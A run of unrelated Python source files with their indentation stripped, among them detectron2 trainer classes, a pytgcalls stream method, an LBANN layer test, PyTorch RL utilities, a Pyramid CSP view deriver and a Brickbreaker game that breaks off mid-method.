verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix, verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for _ in cfg.versionfile_source.split("/"):
root = os.path.dirname(root)
except NameError:
return {
"version": "0+unknown",
"full-revisionid": None,
"dirty": None,
"error": "unable to find root of source tree",
"date": None,
}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {
"version": "0+unknown",
"full-revisionid": None,
"dirty": None,
"error": "unable to compute version",
"date": None,
}
|
the-stack_0_12280 | #coding=utf-8
from facebook.modules.profile.user.models import TestUser
from facebook.graph import GraphAPIError
from django.utils import simplejson
class TestUsers(object):
def __init__(self, graph):
self.graph = graph
# Friend requests need user access token
def update_access_token(self, access_token):
self.graph.access_token = access_token
def generate_new_test_user(self, installed=True, permissions=[]):
response = self.graph.request('%s/accounts/test-users' % self.graph.app_id, None,
{'installed': installed, 'permissions': ', '.join(permissions) })
user = TestUser()
user.save_from_facebook(response, app_id=self.graph.app_id)
return user
def get_test_users(self, login_url_required=False):
""" users is a dict array with the fields access_token, login_url and id. """
response = self.graph.request('%s/accounts/test-users' % self.graph.app_id,
{'access_token': self.graph.access_token })['data']
users=[]
for item in response:
# Facebook sometimes does not deliver a login-url. Ignore those users.
try:
testuser, created = TestUser.objects.get_or_create(id=item['id'],
defaults={'id': item['id'], 'login_url': item['login_url'],
'belongs_to': self.graph.app_id,
'_graph': simplejson.dumps(item) })
if created:
testuser.save_from_facebook(item, app_id=self.graph.app_id)
else:
testuser.login_url = item['login_url']
testuser._graph = simplejson.dumps(item)
testuser.save()
users.append(testuser)
except KeyError:
pass
# cleanup db
users_ids=[int(i['id']) for i in response]
testusers = TestUser.objects.select_related(depth=1).filter(belongs_to=self.graph.app_id)
for user in testusers:
if user.id not in users_ids:
user.delete()
elif not user._name and user.access_token:
self.graph.access_token = user.access_token
response = user.get_from_facebook(graph=self.graph, save=True)
return testusers
def friend_request(self, user1, user2):
graph = self.graph
graph.access_token = user1.access_token
return graph.request('%s/friends/%s' % (user1.id, user2.id), None, {})
def make_friends_with(self, user1, user2):
response = []
self.update_access_token(user1.access_token)
try:
response.append(self.friend_request(user1, user2))
except GraphAPIError as error: #No access token if the user is not authorized.
response.append(error)
self.update_access_token(user2.access_token)
try:
response.append(self.friend_request(user2, user1))
except GraphAPIError as error:
response.append(error)
return response
def unfriend(self, user1, user2):
pass
|
the-stack_0_12283 | # -*- coding: utf-8 -*-
# Copyright (c) Facebook, Inc. and its affiliates.
import logging
import numpy as np
import time
import weakref
from typing import Dict, List, Optional
import torch
from torch.nn.parallel import DataParallel, DistributedDataParallel
import detectron2.utils.comm as comm
from detectron2.utils.events import EventStorage, get_event_storage
from detectron2.utils.logger import _log_api_usage
__all__ = ["HookBase", "TrainerBase", "SimpleTrainer", "AMPTrainer"]
class HookBase:
"""
Base class for hooks that can be registered with :class:`TrainerBase`.
Each hook can implement 4 methods. The way they are called is demonstrated
in the following snippet:
::
hook.before_train()
for iter in range(start_iter, max_iter):
hook.before_step()
trainer.run_step()
hook.after_step()
iter += 1
hook.after_train()
Notes:
1. In the hook method, users can access ``self.trainer`` to access more
properties about the context (e.g., model, current iteration, or config
if using :class:`DefaultTrainer`).
2. A hook that does something in :meth:`before_step` can often be
implemented equivalently in :meth:`after_step`.
If the hook takes non-trivial time, it is strongly recommended to
implement the hook in :meth:`after_step` instead of :meth:`before_step`.
The convention is that :meth:`before_step` should only take negligible time.
Following this convention will allow hooks that do care about the difference
between :meth:`before_step` and :meth:`after_step` (e.g., timer) to
function properly.
"""
trainer: "TrainerBase" = None
"""
A weak reference to the trainer object. Set by the trainer when the hook is registered.
"""
def before_train(self):
"""
Called before the first iteration.
"""
pass
def after_train(self):
"""
Called after the last iteration.
"""
pass
def before_step(self):
"""
Called before each iteration.
"""
pass
def after_step(self):
"""
Called after each iteration.
"""
pass
def state_dict(self):
"""
Hooks are stateless by default, but can be made checkpointable by
implementing `state_dict` and `load_state_dict`.
"""
return {}
class TrainerBase:
"""
Base class for iterative trainer with hooks.
The only assumption we made here is: the training runs in a loop.
A subclass can implement what the loop is.
We made no assumptions about the existence of dataloader, optimizer, model, etc.
Attributes:
iter(int): the current iteration.
start_iter(int): The iteration to start with.
By convention the minimum possible value is 0.
max_iter(int): The iteration to end training.
storage(EventStorage): An EventStorage that's opened during the course of training.
"""
def __init__(self) -> None:
self._hooks: List[HookBase] = []
self.iter: int = 0
self.start_iter: int = 0
self.max_iter: int
self.storage: EventStorage
_log_api_usage("trainer." + self.__class__.__name__)
def register_hooks(self, hooks: List[Optional[HookBase]]) -> None:
"""
Register hooks to the trainer. The hooks are executed in the order
they are registered.
Args:
hooks (list[Optional[HookBase]]): list of hooks
"""
hooks = [h for h in hooks if h is not None]
for h in hooks:
assert isinstance(h, HookBase)
# To avoid circular reference, hooks and trainer cannot own each other.
# This normally does not matter, but will cause memory leak if the
# involved objects contain __del__:
# See http://engineering.hearsaysocial.com/2013/06/16/circular-references-in-python/
h.trainer = weakref.proxy(self)
self._hooks.extend(hooks)
def train(self, start_iter: int, max_iter: int):
"""
Args:
start_iter, max_iter (int): See docs above
"""
logger = logging.getLogger(__name__)
logger.info("Starting training from iteration {}".format(start_iter))
self.iter = self.start_iter = start_iter
self.max_iter = max_iter
with EventStorage(start_iter) as self.storage:
try:
self.before_train()
for self.iter in range(start_iter, max_iter):
self.before_step()
self.run_step()
self.after_step()
# self.iter == max_iter can be used by `after_train` to
# tell whether the training successfully finished or failed
# due to exceptions.
self.iter += 1
except Exception:
logger.exception("Exception during training:")
raise
finally:
self.after_train()
def before_train(self):
for h in self._hooks:
h.before_train()
def after_train(self):
self.storage.iter = self.iter
for h in self._hooks:
h.after_train()
def before_step(self):
# Maintain the invariant that storage.iter == trainer.iter
# for the entire execution of each step
self.storage.iter = self.iter
for h in self._hooks:
h.before_step()
def after_step(self):
for h in self._hooks:
h.after_step()
def run_step(self):
raise NotImplementedError
def state_dict(self):
ret = {"iteration": self.iter}
hooks_state = {}
for h in self._hooks:
sd = h.state_dict()
if sd:
name = type(h).__qualname__
if name in hooks_state:
# TODO handle repetitive stateful hooks
continue
hooks_state[name] = sd
if hooks_state:
ret["hooks"] = hooks_state
return ret
def load_state_dict(self, state_dict):
logger = logging.getLogger(__name__)
self.iter = state_dict["iteration"]
for key, value in state_dict.get("hooks", {}).items():
for h in self._hooks:
try:
name = type(h).__qualname__
except AttributeError:
continue
if name == key:
h.load_state_dict(value)
break
else:
logger.warning(f"Cannot find the hook '{key}', its state_dict is ignored.")
class SimpleTrainer(TrainerBase):
"""
A simple trainer for the most common type of task:
single-cost single-optimizer single-data-source iterative optimization,
optionally using data-parallelism.
It assumes that every step, you:
1. Compute the loss with a data from the data_loader.
2. Compute the gradients with the above loss.
3. Update the model with the optimizer.
All other tasks during training (checkpointing, logging, evaluation, LR schedule)
are maintained by hooks, which can be registered by :meth:`TrainerBase.register_hooks`.
If you want to do anything fancier than this,
either subclass TrainerBase and implement your own `run_step`,
or write your own training loop.
"""
def __init__(self, model, data_loader, optimizer):
"""
Args:
model: a torch Module. Takes a data from data_loader and returns a
dict of losses.
data_loader: an iterable. Contains data to be used to call model.
optimizer: a torch optimizer.
"""
super().__init__()
"""
We set the model to training mode in the trainer.
However it's valid to train a model that's in eval mode.
If you want your model (or a submodule of it) to behave
like evaluation during training, you can overwrite its train() method.
"""
model.train()
self.model = model
self.data_loader = data_loader
self._data_loader_iter = iter(data_loader)
self.optimizer = optimizer
def run_step(self):
"""
Implement the standard training logic described above.
"""
assert self.model.training, "[SimpleTrainer] model was changed to eval mode!"
start = time.perf_counter()
"""
If you want to do something with the data, you can wrap the dataloader.
"""
data = next(self._data_loader_iter)
data_time = time.perf_counter() - start
"""
If you want to do something with the losses, you can wrap the model.
"""
loss_dict = self.model(data)
if isinstance(loss_dict, torch.Tensor):
losses = loss_dict
loss_dict = {"total_loss": loss_dict}
else:
losses = sum(loss_dict.values())
"""
If you need to accumulate gradients or do something similar, you can
wrap the optimizer with your custom `zero_grad()` method.
"""
self.optimizer.zero_grad()
losses.backward()
self._write_metrics(loss_dict, data_time)
"""
If you need gradient clipping/scaling or other processing, you can
wrap the optimizer with your custom `step()` method. But it is
suboptimal as explained in https://arxiv.org/abs/2006.15704 Sec 3.2.4
"""
self.optimizer.step()
def _write_metrics(
self,
loss_dict: Dict[str, torch.Tensor],
data_time: float,
prefix: str = "",
):
"""
Args:
loss_dict (dict): dict of scalar losses
data_time (float): time taken by the dataloader iteration
"""
metrics_dict = {k: v.detach().cpu().item() for k, v in loss_dict.items()}
metrics_dict["data_time"] = data_time
# Gather metrics among all workers for logging
# This assumes we do DDP-style training, which is currently the only
# supported method in detectron2.
all_metrics_dict = comm.gather(metrics_dict)
if comm.is_main_process():
storage = get_event_storage()
# data_time among workers can have high variance. The actual latency
# caused by data_time is the maximum among workers.
data_time = np.max([x.pop("data_time") for x in all_metrics_dict])
storage.put_scalar("data_time", data_time)
# average the rest metrics
metrics_dict = {
k: np.mean([x[k] for x in all_metrics_dict]) for k in all_metrics_dict[0].keys()
}
total_losses_reduced = sum(metrics_dict.values())
if not np.isfinite(total_losses_reduced):
raise FloatingPointError(
f"Loss became infinite or NaN at iteration={self.iter}!\n"
f"loss_dict = {metrics_dict}"
)
storage.put_scalar("{}total_loss".format(prefix), total_losses_reduced)
if len(metrics_dict) > 1:
storage.put_scalars(**metrics_dict)
def state_dict(self):
ret = super().state_dict()
ret["optimizer"] = self.optimizer.state_dict()
return ret
def load_state_dict(self, state_dict):
super().load_state_dict(state_dict)
self.optimizer.load_state_dict(state_dict["optimizer"])
class AMPTrainer(SimpleTrainer):
"""
Like :class:`SimpleTrainer`, but uses PyTorch's native automatic mixed precision
in the training loop.
"""
def __init__(self, model, data_loader, optimizer, grad_scaler=None):
"""
Args:
model, data_loader, optimizer: same as in :class:`SimpleTrainer`.
grad_scaler: torch GradScaler to automatically scale gradients.
"""
unsupported = "AMPTrainer does not support single-process multi-device training!"
if isinstance(model, DistributedDataParallel):
assert not (model.device_ids and len(model.device_ids) > 1), unsupported
assert not isinstance(model, DataParallel), unsupported
super().__init__(model, data_loader, optimizer)
if grad_scaler is None:
from torch.cuda.amp import GradScaler
grad_scaler = GradScaler()
self.grad_scaler = grad_scaler
def run_step(self):
"""
Implement the AMP training logic.
"""
assert self.model.training, "[AMPTrainer] model was changed to eval mode!"
assert torch.cuda.is_available(), "[AMPTrainer] CUDA is required for AMP training!"
from torch.cuda.amp import autocast
start = time.perf_counter()
data = next(self._data_loader_iter)
data_time = time.perf_counter() - start
with autocast():
loss_dict = self.model(data)
if isinstance(loss_dict, torch.Tensor):
losses = loss_dict
loss_dict = {"total_loss": loss_dict}
else:
losses = sum(loss_dict.values())
self.optimizer.zero_grad()
self.grad_scaler.scale(losses).backward()
self._write_metrics(loss_dict, data_time)
self.grad_scaler.step(self.optimizer)
self.grad_scaler.update()
def state_dict(self):
ret = super().state_dict()
ret["grad_scaler"] = self.grad_scaler.state_dict()
return ret
def load_state_dict(self, state_dict):
super().load_state_dict(state_dict)
self.grad_scaler.load_state_dict(state_dict["grad_scaler"])
|
the-stack_0_12285 | import asyncio
from ...exceptions import NodeJSNotRunning
from ...exceptions import NoMtProtoClientSet
from ...exceptions import NotInGroupCallError
from ...scaffold import Scaffold
from ...types import NotInGroupCall
from ...types.session import Session
class ResumeStream(Scaffold):
async def resume_stream(
self,
chat_id: int,
):
"""Resume the paused stream
This method allow to resume the paused streaming file
Parameters:
chat_id (``int``):
Unique identifier (int) of the target chat.
Raises:
NoMtProtoClientSet: In case you try
to call this method without any MtProto client
NodeJSNotRunning: In case you try
to call this method without do
:meth:`~pytgcalls.PyTgCalls.start` before
NotInGroupCallError: In case you try
to leave a non-joined group call
Returns:
``bool``:
On success, true is returned if was resumed
Example:
.. code-block:: python
:emphasize-lines: 10-12
from pytgcalls import Client
from pytgcalls import idle
...
app = PyTgCalls(client)
app.start()
... # Call API methods
app.resume_stream(
-1001185324811,
)
idle()
"""
if self._app is not None:
if self._wait_until_run is not None:
solver_id = Session.generate_session_id(24)
async def internal_sender():
if not self._wait_until_run.done():
await self._wait_until_run
await self._binding.send({
'action': 'resume',
'chat_id': chat_id,
'solver_id': solver_id,
})
active_call = self._call_holder.get_active_call(chat_id)
asyncio.ensure_future(internal_sender())
result = await self._wait_result.wait_future_update(
solver_id,
)
if isinstance(result, NotInGroupCall):
raise NotInGroupCallError()
return active_call.status == 'paused'
else:
raise NodeJSNotRunning()
else:
raise NoMtProtoClientSet()
|
the-stack_0_12286 | import functools
import operator
import os
import os.path
import sys
import numpy as np
# Bamboo utilities
current_file = os.path.realpath(__file__)
print("Current file:",current_file, __file__)
current_dir = os.path.dirname(current_file)
sys.path.insert(0, os.path.join(os.path.dirname(current_dir), 'common_python'))
import tools
# ==============================================
# Objects for Python data reader
# ==============================================
# Note: The Python data reader imports this file as a module and calls
# the functions below to ingest data.
# Data
np.random.seed(201910244)
_num_samples = 128
_sample_size = 64
_sample_dims = (2,2,8)
_sample_size = functools.reduce(operator.mul, _sample_dims)
_samples = np.random.normal(size=(_num_samples,_sample_size)).astype(np.float32)
# Sample access functions
def get_sample(index):
return _samples[index,:]
def num_samples():
return _num_samples
def sample_dims():
return (_sample_size,)
# ==============================================
# Setup LBANN experiment
# ==============================================
def setup_experiment(lbann):
"""Construct LBANN experiment.
Args:
lbann (module): Module for LBANN Python frontend
"""
mini_batch_size = num_samples() // 2
trainer = lbann.Trainer(mini_batch_size)
model = construct_model(lbann)
data_reader = construct_data_reader(lbann)
optimizer = lbann.NoOptimizer()
return trainer, model, data_reader, optimizer
def construct_model(lbann):
"""Construct LBANN model.
Args:
lbann (module): Module for LBANN Python frontend
"""
# Input data
# Note: Sum with a weights layer so that gradient checking will
# verify that error signals are correct.
x_weights = lbann.Weights(optimizer=lbann.SGD(),
initializer=lbann.ConstantInitializer(value=0.0),
name='input_weights')
x = lbann.Sum(lbann.Reshape(lbann.Input(data_field='samples'),
dims=tools.str_list(_sample_dims)),
lbann.WeightsLayer(weights=x_weights,
dims=tools.str_list(_sample_dims)))
x_lbann = x
# Objects for LBANN model
obj = []
metrics = []
callbacks = []
# ------------------------------------------
# Data-parallel layout
# ------------------------------------------
# LBANN implementation
x = x_lbann
y = lbann.Identity(x, data_layout='data_parallel')
slice_points = (0, 4, 8)
x_slice = lbann.Slice(x, axis=2, slice_points=tools.str_list(slice_points),parallel_strategy = {'sub_branch_tag':0,'enable_subgraph':True})
branch1 = lbann.Identity(x_slice, data_layout='data_parallel',parallel_strategy = {'sub_branch_tag':1,'enable_subgraph':True})
branch2 = lbann.Identity(x_slice, data_layout='data_parallel',parallel_strategy = {'sub_branch_tag':2,'enable_subgraph':True})
branch1 = lbann.L2Norm2(branch1)
branch2 = lbann.L2Norm2(branch2)
sum_branch = lbann.Sum([branch1,branch2],parallel_strategy = {'sub_branch_tag':0,'enable_subgraph':True})
z = lbann.Identity(sum_branch)
obj.append(z)
metrics.append(lbann.Metric(z, name='data-parallel layout'))
# NumPy implementation
vals = []
for i in range(num_samples()):
x = get_sample(i).reshape(_sample_dims).astype(np.float64)
y = []
cross_sum = 0
for j in range(len(slice_points)-1):
x_slice = x[:,:,slice_points[j]:slice_points[j+1]]
x_l2 = tools.numpy_l2norm2(x_slice)
if(j==0):
cross_sum = x_l2
else:
cross_sum += x_l2
z = cross_sum
vals.append(z)
val = np.mean(vals)
tol = 8 * val * np.finfo(np.float32).eps
callbacks.append(lbann.CallbackCheckMetric(
metric=metrics[-1].name,
lower_bound=val-tol,
upper_bound=val+tol,
error_on_failure=True,
execution_modes='test'))
# ------------------------------------------
# Gradient checking
# ------------------------------------------
callbacks.append(lbann.CallbackCheckGradients(error_on_failure=True))
# ------------------------------------------
# Construct model
# ------------------------------------------
num_epochs = 0
return lbann.Model(num_epochs,subgraph_communication=lbann.SubgraphCommunication.COLL_OPT,
layers=lbann.traverse_layer_graph(x_lbann),
objective_function=obj,
metrics=metrics,
callbacks=callbacks)
def construct_data_reader(lbann):
"""Construct Protobuf message for Python data reader.
The Python data reader will import the current Python file to
access the sample access functions.
Args:
lbann (module): Module for LBANN Python frontend
"""
# Note: The training data reader should be removed when
# https://github.com/LLNL/lbann/issues/1098 is resolved.
message = lbann.reader_pb2.DataReader()
message.reader.extend([
tools.create_python_data_reader(
lbann,
current_file,
'get_sample',
'num_samples',
'sample_dims',
'train'
)
])
message.reader.extend([
tools.create_python_data_reader(
lbann,
current_file,
'get_sample',
'num_samples',
'sample_dims',
'test'
)
])
return message
# ==============================================
# Setup PyTest
# ==============================================
# Create test functions that can interact with PyTest
for _test_func in tools.create_tests(setup_experiment, __file__):
globals()[_test_func.__name__] = _test_func
|
the-stack_0_12289 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name:kerasexa
Description: Keras 案例
https://keras.io/getting-started/sequential-model-guide/
Email : [email protected]
Date:2018/1/1
"""
import keras
import numpy as np
from keras.layers import Dense, Dropout
from keras.models import Sequential
from keras.optimizers import SGD
# Generate dummy data
x_train = np.random.random((1000, 20))
y_train = keras.utils.to_categorical(np.random.randint(10, size=(1000, 1)), num_classes=10)
x_test = np.random.random((100, 20))
y_test = keras.utils.to_categorical(np.random.randint(10, size=(100, 1)), num_classes=10)
model = Sequential()
# Dense(64) is a fully-connected layer with 64 hidden units.
# in the first layer, you must specify the expected input data shape:
# here, 20-dimensional vectors.
model.add(Dense(64, activation='relu', input_dim=20))
model.add(Dropout(0.5))
model.add(Dense(64, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(10, activation='softmax'))
sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])
model.fit(x_train, y_train, epochs=200, batch_size=128)
score = model.evaluate(x_test, y_test, batch_size=128)
print(score)
|
the-stack_0_12293 | from __future__ import print_function
import os
import torch
from torch.utils.ffi import create_extension
sources = ['src/roi_pooling.cpp']
headers = ['src/roi_pooling.h']
defines = []
with_cuda = False
if torch.cuda.is_available():
print('Including CUDA code.')
sources += ['src/roi_pooling_cuda.cpp']
headers += ['src/roi_pooling_cuda.h']
defines += [('WITH_CUDA', None)]
with_cuda = True
this_file = os.path.dirname(os.path.realpath(__file__))
print(this_file)
extra_objects = ['src/roi_pooling.cu.o']
extra_objects = [os.path.join(this_file, fname) for fname in extra_objects]
ffi = create_extension(
'_ext.roi_pooling',
headers=headers,
sources=sources,
define_macros=defines,
relative_to=__file__,
with_cuda=with_cuda,
extra_objects=extra_objects,
libraries=["ATen", '_C', 'cudart']
)
if __name__ == '__main__':
ffi.build()
|
the-stack_0_12294 | import os
import torch
import torch.nn.functional as F
import torch.distributed as dist
from torch.autograd import Variable
import numpy as np
# https://github.com/ikostrikov/pytorch-ddpg-naf/blob/master/ddpg.py#L11
def soft_update(target, source, tau):
"""
Perform DDPG soft update (move target params toward source based on weight
factor tau)
Inputs:
target (torch.nn.Module): Net to copy parameters to
source (torch.nn.Module): Net whose parameters to copy
tau (float, 0 < x < 1): Weight factor for update
"""
for target_param, param in zip(target.parameters(), source.parameters()):
target_param.data.copy_(target_param.data * (1.0 - tau) + param.data * tau)
# https://github.com/ikostrikov/pytorch-ddpg-naf/blob/master/ddpg.py#L15
def hard_update(target, source):
"""
Copy network parameters from source to target
Inputs:
target (torch.nn.Module): Net to copy parameters to
source (torch.nn.Module): Net whose parameters to copy
"""
for target_param, param in zip(target.parameters(), source.parameters()):
target_param.data.copy_(param.data)
# https://github.com/seba-1511/dist_tuto.pth/blob/gh-pages/train_dist.py
def average_gradients(model):
""" Gradient averaging. """
size = float(dist.get_world_size())
for param in model.parameters():
dist.all_reduce(param.grad.data, op=dist.reduce_op.SUM, group=0)
param.grad.data /= size
# https://github.com/seba-1511/dist_tuto.pth/blob/gh-pages/train_dist.py
def init_processes(rank, size, fn, backend='gloo'):
""" Initialize the distributed environment. """
os.environ['MASTER_ADDR'] = '127.0.0.1'
os.environ['MASTER_PORT'] = '29500'
dist.init_process_group(backend, rank=rank, world_size=size)
fn(rank, size)
def onehot_from_logits(logits, eps=0.0):
"""
Given batch of logits, return one-hot sample using epsilon greedy strategy
(based on given epsilon)
"""
# get best (according to current policy) actions in one-hot form
argmax_acs = (logits == logits.max(1, keepdim=True)[0]).float()
if eps == 0.0:
return argmax_acs
# get random actions in one-hot form
rand_acs = Variable(torch.eye(logits.shape[1])[[np.random.choice(
range(logits.shape[1]), size=logits.shape[0])]], requires_grad=False)
# chooses between best and random actions using epsilon greedy
return torch.stack([argmax_acs[i] if r > eps else rand_acs[i] for i, r in
enumerate(torch.rand(logits.shape[0]))])
# modified for PyTorch from https://github.com/ericjang/gumbel-softmax/blob/master/Categorical%20VAE.ipynb
def sample_gumbel(shape, eps=1e-20, tens_type=torch.FloatTensor):
"""Sample from Gumbel(0, 1)"""
U = Variable(tens_type(*shape).uniform_(), requires_grad=False)
return -torch.log(-torch.log(U + eps) + eps)
# modified for PyTorch from https://github.com/ericjang/gumbel-softmax/blob/master/Categorical%20VAE.ipynb
def gumbel_softmax_sample(logits, temperature):
""" Draw a sample from the Gumbel-Softmax distribution"""
gumbSamp = sample_gumbel(logits.shape, tens_type=type(logits.data))
if logits.is_cuda:
gumbSamp = gumbSamp.cuda()
y = logits + gumbSamp
return F.softmax(y / temperature, dim=-1)
# modified for PyTorch from https://github.com/ericjang/gumbel-softmax/blob/master/Categorical%20VAE.ipynb
def gumbel_softmax(logits, temperature=1.0, hard=False):
"""Sample from the Gumbel-Softmax distribution and optionally discretize.
Args:
logits: [batch_size, n_class] unnormalized log-probs
temperature: non-negative scalar
hard: if True, take argmax, but differentiate w.r.t. soft sample y
Returns:
[batch_size, n_class] sample from the Gumbel-Softmax distribution.
If hard=True, then the returned sample will be one-hot, otherwise it will
be a probabilitiy distribution that sums to 1 across classes
"""
y = gumbel_softmax_sample(logits, temperature)
if hard:
y_hard = onehot_from_logits(y)
y = (y_hard - y).detach() + y
return y
|
the-stack_0_12296 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
def csp_protected_view(view, info):
"""
A view deriver which adds Content-Security-Policy headers to responses.
By default, a global policy is applied to every view.
Individual views can opt out of CSP altogether by specifying a view option
``csp_insecure_optout=True``. This is not recommended.
"""
if not info.registry.settings.get("csp.enabled", False):
return view
# Views can set ``csp_insecure_optout=True`` in their view options to
# disable CSP for the view.
if info.options.get("csp_insecure_optout"):
return view
policy = info.registry.settings.get("csp", {})
clauses = [
" ".join([directive] + values) for directive, values in sorted(policy.items())
]
header_value = "; ".join(clauses)
if info.registry.settings.get("csp.report_only", False):
header_name = "Content-Security-Policy-Report-Only"
else:
header_name = "Content-Security-Policy"
def wrapper_view(context, request):
resp = view(context, request)
resp.headers[header_name] = header_value
return resp
return wrapper_view
csp_protected_view.options = ("csp_insecure_optout",)
def includeme(config):
config.add_view_deriver(csp_protected_view)
|
the-stack_0_12298 | """
This file contains the fundamental BrickBreaker game logic.
"""
import pygame
from pygame.locals import *
from GameElements import Paddle, Ball, Brick, Special, SpecialText, \
SpecialType, to_drop_special, choose_random_special, BOUNCE_OFF_VECTORS
from Player import Player
from LevelGenerator import LevelGenerator
from GameElements import Movement
from enum import Enum
from DatabaseInteract import DatabaseInteract
from GameState import GameState
from Constants import DISPLAY_WIDTH, DISPLAY_HEIGHT, WHITE, BLUE
from UIElement import TextElement
from pygame.sprite import RenderUpdates
from HighscorePage import highscore
import os
DEFAULT_CLOCK_SPEED = 60
CLOCK_SPEED_CHANGE_FACTOR = 1.5
class RectSide(Enum):
""" Enum indicating different sides of a rectangle """
TOP = 0
BOTTOM = 1
LEFT = 3
RIGHT = 3
class CollisionType(Enum):
""" Enum indication the possible brick collision types """
HORIZONTAL = 0
VERTICAL = 1
class Brickbreaker:
def __init__(self):
"""
description:
- Create a new instance of the Brickbreaker class.
- Initialize all attributes.
"""
self.clock_speed = DEFAULT_CLOCK_SPEED
self.screen = pygame.display.set_mode((DISPLAY_WIDTH, DISPLAY_HEIGHT))
self.bricks = []
self.number_unbreakable_bricks = 0
self.paddle = Paddle()
self.ball = Ball()
self.present_specials = []
self.active_special = None
self.spcl_text = None
pygame.font.init()
self.font = pygame.font.SysFont("Arial", 25)
self.player = Player(current_level=1)
def start_game(self):
"""
description:
- Create new level.
- Position the paddle to the middle of the screen.
- Call method to choose starting angle.
:return: nothing
"""
self.create_blocks()
self.paddle.reset_position()
self.reset_ball()
def reset_ball(self):
"""
description:
- Center the ball over paddle and give the player the opportunity to choose inital angle.
- Loop:
- Switch angles using custom set left and right keys. Selected angles is displayed.
- Shoot ball using custom set key.
:return: nothing
"""
if not (self.active_special is None):
self.remove_special()
dbi = DatabaseInteract()
sets = dbi.get_settings()
key_left = int(sets[2])
key_right = int(sets[4])
key_shoot = int(sets[9])
self.ball.center_over_paddle(self.paddle.get_center())
vector_indicator_start = (self.ball.form.centerx, self.ball.form.centery - 5)
current_index = int(len(BOUNCE_OFF_VECTORS)/2) - 1
clock = pygame.time.Clock()
vector_selected = False
while not vector_selected:
clock.tick(60)
self.draw_all()
self.draw_start_text()
currently_selected_vector = BOUNCE_OFF_VECTORS[current_index]
events = pygame.event.get()
for event in events:
if event.type == QUIT:
os._exit(1)
if event.type == pygame.KEYDOWN:
if event.key == key_left:
if current_index > 0:
current_index -= 1
elif event.key == key_right:
if current_index < len(BOUNCE_OFF_VECTORS) - 1:
current_index += 1
elif event.key == key_shoot:
self.ball.vector = currently_selected_vector
vector_selected = True
break
elif event.key == pygame.K_ESCAPE:
return GameState.TITLE
vector_indicator_end = (vector_indicator_start[0] + 10 * currently_selected_vector[0],
vector_indicator_start[1] + 10 * currently_selected_vector[1])
pygame.draw.line(self.screen, WHITE, vector_indicator_start, vector_indicator_end, 3)
pygame.display.flip()
def create_blocks(self):
"""
description:
- Create the bricks for the player's current level using the LevelGenerator-Class.
:return: nothing
"""
self.bricks, self.number_unbreakable_bricks = LevelGenerator().create_level(self.player.current_level)
def check_ball_collisions(self):
"""
description:
- Checks all possible collisions that can occur for the ball.
- Bounce off at left, right and top edge.
- Bounce off from paddle using paddle.hitzones' vectors.
- Check for brick collision and delegate handling.
- Check if player dropped the ball.
- if decremented to 0 --> game over --> save score --> restart
:return:
"""
# collision left or right edge
if self.ball.form.x <= 0 or self.ball.form.x >= DISPLAY_WIDTH:
self.ball.collide_vertical()
if self.ball.form.x <= 0:
self.ball.form.x = 1
else:
self.ball.form.x = DISPLAY_WIDTH - 1
# collision top edge
if self.ball.form.y <= 0:
self.ball.form.y = 1
self.ball.collide_horizontal()
# collission paddle
for paddle_part in self.paddle.hitzones:
if paddle_part[0].colliderect(self.ball.form):
self.ball.vector = paddle_part[1]
break
# brick collisions
collision_bricks = []
for brick in self.bricks:
if brick.rect.colliderect(self.ball.form):
collision_bricks.append(brick)
if len(collision_bricks) > 0:
self.handle_brick_collisions(collision_bricks)
# collision bottom edge --> lost
if self.ball.form.y > DISPLAY_HEIGHT:
self.player.lives -= 1
if self.player.lives == 0:
highscore(self.screen, self.player.score)
self.player.set_lives()
self.player.score = 0
self.player.current_level = 1
self.start_game()
else:
self.reset_ball()
def check_previously_horizontally_outside(self, brick_rect, horizontal_movement):
"""
description:
- Check whether the ball did not horizontally overlap with the currently brick hit in the previous frame.
- Aligned edges do not count as overlap.
:param brick_rect: pygame.Rect-Object representing the hit brick's position.
:param horizontal_movement: Movement-Enum value indicating left or right movement
:return: true if no overlap, false otherwise
"""
ball_pos_previous = self.ball.get_previous_position()
ball_rect_previous = pygame.Rect(ball_pos_previous[0], ball_pos_previous[1], self.ball.form.width,
self.ball.form.height)
if horizontal_movement == Movement.RIGHT:
return ball_rect_previous.right <= brick_rect.left
else:
return ball_rect_previous.left >= brick_rect.right
def check_previously_vertically_outside(self, brick_rect, vertical_movement):
"""
description:
- Check whether the ball did not vertically overlap with the currently brick hit in the previous frame.
- Aligned edges do not count as overlap.
:param brick_rect: pygame.Rect-Object representing the hit brick's position.
:param vertical_movement: Movement-Enum value indicating up or down movement
:return: true if no overlap, false otherwise
"""
ball_pos_previous = self.ball.get_previous_position()
ball_rect_previous = pygame.Rect(ball_pos_previous[0], ball_pos_previous[1], self.ball.form.width,
self.ball.form.height)
if vertical_movement == Movement.DOWN:
return ball_rect_previous.bottom <= brick_rect.top
else:
return ball_rect_previous.top >= brick_rect.bottom
def handle_brick_collisions(self, collision_bricks):
"""
description:
- Handle the brick-collision based on the number of bricks hit.
- If only one brick was hit: Call function to perform brick collision with determined collision type
- More than one (basically working with the first 2,
edge-case of more than 2 ignored due to unlikelihood and complexity):
- Determine expected collision type based on the relative position of the 2 bricks.
- Determine calculated collision type for 2 bricks.
- Perform brick collision with the brick matching the expected collision type.
- If none matches: chose one (irrelevant for user experience) to perform the brick collision with using
expected collision type.
:param collision_bricks: list of Brick-objects hit by the ball
:return: nothing
"""
if len(collision_bricks) == 1:
self.perform_brick_collision(collision_bricks[0], self.determine_collision_type(collision_bricks[0]))
else:
if collision_bricks[0].rect.x == collision_bricks[1].rect.x: # above each other
collision_required = CollisionType.VERTICAL
else: # next to each other
collision_required = CollisionType.HORIZONTAL
brick1_collision = self.determine_collision_type(collision_bricks[0])
brick2_collision = self.determine_collision_type(collision_bricks[1])
if brick1_collision == collision_required:
self.perform_brick_collision(collision_bricks[0], brick1_collision)
